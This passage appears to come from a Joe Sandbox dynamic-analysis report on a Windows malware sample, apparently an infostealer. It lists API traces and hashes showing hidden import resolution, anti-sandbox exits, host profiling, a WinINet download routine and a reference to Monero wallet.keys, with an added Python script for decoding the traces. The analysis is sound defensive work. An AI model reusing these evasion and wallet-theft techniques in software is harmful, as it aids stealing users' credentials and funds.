                        • GetProcAddress.KERNEL32(75A50000,01254E40), ref: 006AA36A
                        • GetProcAddress.KERNEL32(75A50000,01269010), ref: 006AA382
                        • GetProcAddress.KERNEL32(75A50000,0126E3B8), ref: 006AA39B
                        • GetProcAddress.KERNEL32(75A50000,0126E1D8), ref: 006AA3B3
                        • GetProcAddress.KERNEL32(75A50000,01254F80), ref: 006AA3CB
                        • GetProcAddress.KERNEL32(75A50000,01254FA0), ref: 006AA3E4
                        • GetProcAddress.KERNEL32(75A50000,0126E370), ref: 006AA3FC
                        • GetProcAddress.KERNEL32(75A50000,0126E208), ref: 006AA414
                        • GetProcAddress.KERNEL32(75070000,01254FC0), ref: 006AA436
                        • GetProcAddress.KERNEL32(75070000,0126E148), ref: 006AA44E
                        • GetProcAddress.KERNEL32(75070000,0126E3D0), ref: 006AA466
                        • GetProcAddress.KERNEL32(75070000,0126E3E8), ref: 006AA47F
                        • GetProcAddress.KERNEL32(75070000,0126E2B0), ref: 006AA497
                        • GetProcAddress.KERNEL32(74E50000,01254E60), ref: 006AA4B8
                        • GetProcAddress.KERNEL32(74E50000,01254DE0), ref: 006AA4D1
                        • GetProcAddress.KERNEL32(75320000,01255100), ref: 006AA4F2
                        • GetProcAddress.KERNEL32(75320000,0126E2C8), ref: 006AA50A
                        • GetProcAddress.KERNEL32(6F060000,012550C0), ref: 006AA530
                        • GetProcAddress.KERNEL32(6F060000,01254FE0), ref: 006AA548
                        • GetProcAddress.KERNEL32(6F060000,01255000), ref: 006AA560
                        • GetProcAddress.KERNEL32(6F060000,0126E160), ref: 006AA579
                        • GetProcAddress.KERNEL32(6F060000,01254E80), ref: 006AA591
                        • GetProcAddress.KERNEL32(6F060000,01254F20), ref: 006AA5A9
                        • GetProcAddress.KERNEL32(6F060000,01255020), ref: 006AA5C2
                        • GetProcAddress.KERNEL32(6F060000,01255080), ref: 006AA5DA
                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 006AA5F1
                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 006AA607
                        • GetProcAddress.KERNEL32(74E00000,0126E220), ref: 006AA629
                        • GetProcAddress.KERNEL32(74E00000,01269070), ref: 006AA641
                        • GetProcAddress.KERNEL32(74E00000,0126E2E0), ref: 006AA659
                        • GetProcAddress.KERNEL32(74E00000,0126E418), ref: 006AA672
                        • GetProcAddress.KERNEL32(74DF0000,01255040), ref: 006AA693
                        • GetProcAddress.KERNEL32(6E520000,0126E430), ref: 006AA6B4
                        • GetProcAddress.KERNEL32(6E520000,012550E0), ref: 006AA6CD
                        • GetProcAddress.KERNEL32(6E520000,0126E178), ref: 006AA6E5
                        • GetProcAddress.KERNEL32(6E520000,0126E340), ref: 006AA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 78c09b81222a163bebe2a74e5d3a6b22fc5e75adbe442935a160a9d158c77b44
                        • Instruction ID: e62769a4b801fdf147d7b7870c898247c056fdd9269ca833f2a4afc0d3ff64f2
                        • Opcode Fuzzy Hash: 78c09b81222a163bebe2a74e5d3a6b22fc5e75adbe442935a160a9d158c77b44
                        • Instruction Fuzzy Hash: 7F624AB5602241AFC74CDFA9FD889663BF9F74C301734872BAA49C3264D7399941DB22

                        Control-flow Graph (rendered graph not reproduced; basic blocks and their calls, taken from the graph data)
                        • 696280-69630b: call 6aa7a0, call 6947b0, call 6aa740, InternetOpenA, StrCmpCA; via 69630d / 696314-696318 the function branches either to 69631e or to the exit path at 696509
                        • 69631e-696342: InternetConnectA; the other branch goes to 6964ff-696503: InternetCloseHandle, then 696509
                        • 696348-69635a: short branch into 696364-696392: HttpOpenRequestA; the other branch goes to 6964f5-6964f9: InternetCloseHandle
                        • 696398-69639c: branches either through 69639e-6963bf: InternetSetOptionA or directly to 6963c5-696405: HttpSendRequestA, HttpQueryInfoA
                        • 696407-696427: call 6aa740, call 6aa800 ×2, then exit; or 69642c-69644b: call 6a8940, followed either by 6964c9-6964e9 (call 6aa740, call 6aa800 ×2, exit) or by 69644d-696454
                        • 696456-696480: InternetReadFile; 696482-696489 loops back through 69648d-6964c5 (6aa9b0, 6aa8a0, 6aa800) until the read loop ends at 69648b
                        • 6964c7-6964ef, 6964f5-6964f9, 6964ff-696503: three InternetCloseHandle calls chained in turn; 696509-696525: call 6aa7a0, call 6aa800 ×2; 696528-69652d: exit
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                          • Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
                        • StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00696385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006963FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0069646D
                        • InternetCloseHandle.WININET(00000000), ref: 006964EF
                        • InternetCloseHandle.WININET(00000000), ref: 006964F9
                        • InternetCloseHandle.WININET(00000000), ref: 00696503
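The two WinINet functions above (694880 and 696280) share one download skeleton, InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA and an InternetReadFile loop with a 0x7CF-byte buffer; the second variant additionally calls InternetSetOptionA with option 0x1F and HttpQueryInfoA with info level 0x13 before reading. The resolver at 6a9c10 fills the sample's API table through 104 GetProcAddress calls, with the name argument recorded only as a heap address (0125xxxx / 0126xxxx) for all but InternetSetOptionA and HttpQueryInfoA, so the import list is not visible in the trace. The script below is an added example and is not part of this report nor Joe Sandbox code: it parses trace lines in the report's own `Api.MODULE(args), ref: addr` layout and decodes the numeric arguments with the standard wininet.h constants (INTERNET_OPEN_TYPE_DIRECT = 1, INTERNET_SERVICE_HTTP = 3, INTERNET_OPTION_SECURITY_FLAGS = 31, HTTP_QUERY_STATUS_CODE = 19, INTERNET_FLAG_KEEP_CONNECTION = 0x00400000, INTERNET_FLAG_PRAGMA_NOCACHE = 0x100). SAMPLE_TRACE is a constructed sample copied from the API lists above; the function names and the DOWNLOAD_SKELETON list are the example's own.

```python
"""Decode Joe Sandbox-style API trace lines into a readable WinINet call chain and an
import-resolution summary. Added example, not Joe Sandbox code; SAMPLE_TRACE is a
constructed sample copied from the API lists in this report."""
import re
from collections import Counter

SAMPLE_TRACE = """
• InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
• StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696303
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
• HttpOpenRequestA.WININET(00000000,GET,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00696385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006963FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0069646D
• InternetCloseHandle.WININET(00000000), ref: 006964EF
• GetProcAddress.KERNEL32(75900000,01255260), ref: 006A9C2D
• GetProcAddress.KERNEL32(75900000,012551C0), ref: 006A9C45
• LoadLibraryA.KERNEL32(0126DE90,?,006A5CA3,006B0AEB), ref: 006AA03D
• GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 006AA5F1
• GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 006AA607
"""

# Standard wininet.h constants (the report itself shows only the raw numbers).
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                  0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
                  0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
                  0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
INTERNET_OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {19: "HTTP_QUERY_STATUS_CODE"}
LINE_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})")
HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")
# Ordered skeleton of a WinINet download; other calls may sit in between (example's own list).
DOWNLOAD_SKELETON = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA", "InternetReadFile"]


def hexarg(arg):
    """Integer value of an 8-hex-digit argument; None for '?' (unknown) or a literal name."""
    return int(arg, 16) if HEX_RE.fullmatch(arg) else None


def parse_trace(text):
    """One dict per 'Api.MODULE(args), ref: addr' line; bullets and other lines are ignored."""
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.fullmatch(raw.strip().lstrip("•").strip())
        if m:
            calls.append({"api": m["api"], "module": m["mod"], "ref": m["ref"],
                          "args": [a.strip() for a in m["args"].split(",")]})
    return calls


def decode_flags(value, table):
    """Names of the known bits set in value, with any unknown remainder kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    return names + ([hex(rest)] if rest else [])


def decode_call(call):
    """Human-readable meaning of the numeric arguments of the WinINet calls seen in the report."""
    api, a = call["api"], call["args"]
    if api == "InternetOpenA":        # (agent, access type, proxy, bypass, flags)
        return {"access_type": INTERNET_OPEN_TYPE.get(hexarg(a[1]), a[1])}
    if api == "InternetConnectA":     # (h, server, port, user, pass, service, flags, ctx)
        return {"service": INTERNET_SERVICE.get(hexarg(a[5]), a[5])}
    if api == "HttpOpenRequestA":     # (h, verb, object, version, referrer, accept, flags, ctx)
        return {"verb": a[1], "flags": decode_flags(hexarg(a[6]) or 0, INTERNET_FLAGS)}
    if api == "InternetSetOptionA":   # (h, option, buffer, buffer length); the value itself is '?'
        return {"option": INTERNET_OPTION.get(hexarg(a[1]), a[1]), "buffer_len": hexarg(a[3])}
    if api == "HttpQueryInfoA":       # (h, info level, buffer, buffer length, index)
        return {"info_level": HTTP_QUERY.get(hexarg(a[1]), a[1])}
    if api == "InternetReadFile":     # (h, buffer, bytes to read, bytes read)
        return {"chunk_bytes": hexarg(a[2])}
    return {}


def wininet_chain(calls):
    """WinINet API names in call order."""
    return [c["api"] for c in calls if c["module"] == "WININET"]


def is_download_chain(calls):
    """True when DOWNLOAD_SKELETON occurs in order, possibly interleaved with other calls."""
    pending = list(DOWNLOAD_SKELETON)
    for api in wininet_chain(calls):
        if pending and api == pending[0]:
            pending.pop(0)
    return not pending


def summarize_resolution(calls):
    """GetProcAddress count per module handle, LoadLibraryA count, and the names passed in
    clear (every other name arrives only as a heap address, i.e. a string built at run time)."""
    gpa = [c for c in calls if c["api"] == "GetProcAddress"]
    return {"per_module": dict(Counter(c["args"][0] for c in gpa)),
            "loadlibrary_calls": sum(c["api"] == "LoadLibraryA" for c in calls),
            "cleartext_names": [c["args"][1] for c in gpa if hexarg(c["args"][1]) is None]}


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for c in calls:
        if decode_call(c):
            print(c["ref"], c["api"], decode_call(c))
    print("download chain present:", is_download_chain(calls))
    print("import resolution:", summarize_resolution(calls))
```

Run as-is to print the decoded chain, or paste the API list of any other function from this report into `parse_trace` to compare. The trace records the buffer passed to InternetSetOptionA only as '?', so the script reports the option name and buffer length and does not guess which SECURITY_FLAG_* bits were set.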
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: cd43b02c615158f446e4c637072bc12ef4b37cec17e8c58003780fa1c8f5295d
                        • Instruction ID: 42940420df6eaeb7465e7e40fe4235d06442b346400c8e8ef7f7c02aa619dab1
                        • Opcode Fuzzy Hash: cd43b02c615158f446e4c637072bc12ef4b37cec17e8c58003780fa1c8f5295d
                        • Instruction Fuzzy Hash: 88715B71A00318ABDF64EBE0CC49BEE77BABB45700F108199F50A6B590DBB46E85CF51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        • Control-flow graph for the function at 006A5510 (graph rendering not reproduced; node and edge list omitted)
                        APIs
                          • Part of subcall function 006AA820: lstrlen.KERNEL32(00694F05,?,?,00694F05,006B0DDE), ref: 006AA82B
                          • Part of subcall function 006AA820: lstrcpy.KERNEL32(006B0DDE,00000000), ref: 006AA885
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5857
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5228
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5318
                          • Part of subcall function 006A52C0: lstrlen.KERNEL32(00000000), ref: 006A532F
                          • Part of subcall function 006A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 006A5364
                          • Part of subcall function 006A52C0: lstrlen.KERNEL32(00000000), ref: 006A5383
                          • Part of subcall function 006A52C0: lstrlen.KERNEL32(00000000), ref: 006A53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 006A5A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 35c198e61aea0afa3b519abd2a3ca4fe855ad123ee7c276cade93326aeaf9ffb
                        • Instruction ID: 804c03c5f368dacde76bad10e93c683e6ab4e23c03cb2280c0fcb0ea65f367ba
                        • Opcode Fuzzy Hash: 35c198e61aea0afa3b519abd2a3ca4fe855ad123ee7c276cade93326aeaf9ffb
                        • Instruction Fuzzy Hash: 0CE12071910104AACB98FBE0DC52AFE737AAF56300F50856EB50766191EF34AE09CF96

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        • Control-flow graph for the function at 006A17A0 (graph rendering not reproduced; node and edge list omitted)
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 006A17C5
                        • ExitProcess.KERNEL32 ref: 006A17D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: a9057c3098630ecedd346f4c44fbb6fed2a8fd5a2c02c7205c7141d401476f15
                        • Instruction ID: 35b76d9dd390dbebcd5fcbe78ab37e0d6ef5c67a2f0b5e699939e0588f90074f
                        • Opcode Fuzzy Hash: a9057c3098630ecedd346f4c44fbb6fed2a8fd5a2c02c7205c7141d401476f15
                        • Instruction Fuzzy Hash: 84514BB4A00209EFDB14EFA0D964ABF77B6BF46704F104159E806AB290D774ED42DF62

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        • Control-flow graph for the function at 006A7500 (graph rendering not reproduced; node and edge list omitted)
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006A7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006A757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A760A
                        • wsprintfA.USER32 ref: 006A7640
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$k
                        • API String ID: 1544550907-1212298063
                        • Opcode ID: 9571fdd7e68b0aa8cf305ef38eada6cea9a3710d75b0f96c33d305cb4ce36268
                        • Instruction ID: 177a12aed8075a267b66bc9cf05d56e328756d12afbc5f4915a56e98d314ffb8
                        • Opcode Fuzzy Hash: 9571fdd7e68b0aa8cf305ef38eada6cea9a3710d75b0f96c33d305cb4ce36268
                        • Instruction Fuzzy Hash: A84180B1D05248ABDB14EF94DC45BEEBBB9BF19700F100199F50A67280DB74AE44CFA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260C18), ref: 006A98A1
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260EB8), ref: 006A98BA
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260ED0), ref: 006A98D2
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260C30), ref: 006A98EA
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260C48), ref: 006A9903
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01268F70), ref: 006A991B
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01255480), ref: 006A9933
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,012553C0), ref: 006A994C
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260D80), ref: 006A9964
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260C60), ref: 006A997C
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260CA8), ref: 006A9995
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260D98), ref: 006A99AD
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01255400), ref: 006A99C5
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260CC0), ref: 006A99DE
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006911D0: ExitProcess.KERNEL32 ref: 00691211
                          • Part of subcall function 00691160: GetSystemInfo.KERNEL32(?), ref: 0069116A
                          • Part of subcall function 00691160: ExitProcess.KERNEL32 ref: 0069117E
                          • Part of subcall function 00691110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0069112B
                          • Part of subcall function 00691110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00691132
                          • Part of subcall function 00691110: ExitProcess.KERNEL32 ref: 00691143
                          • Part of subcall function 00691220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0069123E
                          • Part of subcall function 00691220: ExitProcess.KERNEL32 ref: 00691294
                          • Part of subcall function 006A6770: GetUserDefaultLangID.KERNEL32 ref: 006A6774
                          • Part of subcall function 00691190: ExitProcess.KERNEL32 ref: 006911C6
                          • Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
                          • Part of subcall function 006A7850: RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
                          • Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F
                          • Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
                          • Part of subcall function 006A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
                          • Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01268F90,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006A6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 006A6AF9
                        • Sleep.KERNEL32(00001770), ref: 006A6B04
                        • CloseHandle.KERNEL32(?,00000000,?,01268F90,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6B1A
                        • ExitProcess.KERNEL32 ref: 006A6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
